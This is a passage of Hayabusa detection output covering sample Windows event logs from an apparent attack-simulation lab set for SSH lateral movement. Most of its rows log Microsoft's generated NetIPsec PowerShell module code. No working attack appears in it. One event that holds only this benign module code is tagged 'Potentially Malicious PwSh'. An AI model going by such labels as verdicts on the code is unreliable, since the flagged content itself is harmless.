$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction] ${Action}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv6Addresses}, [Parameter(ParameterSetName='Query (cdxml)', ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', ValueFromPipelineByPropertyName=$true)] [string[]] ${IPv4Addresses}, [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType] ${EndpointType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.ChangeAction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv6Addresses')) { [object]$__cmdletization_value = ${IPv6Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv6Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPv4Addresses')) { [object]$__cmdletization_value = ${IPv4Addresses} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IPv4Addresses'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PassThru')) { [object]$__cmdletization_value = ${PassThru} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PassThru'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SetPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Update-NetIPsecRule' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.082 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.082 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.083 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.083 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.083 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Find-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.084 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.084 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.085 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.085 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.091 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.091 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.092 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.092 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Sync-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.092 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Update-NetIPsecRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.215 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 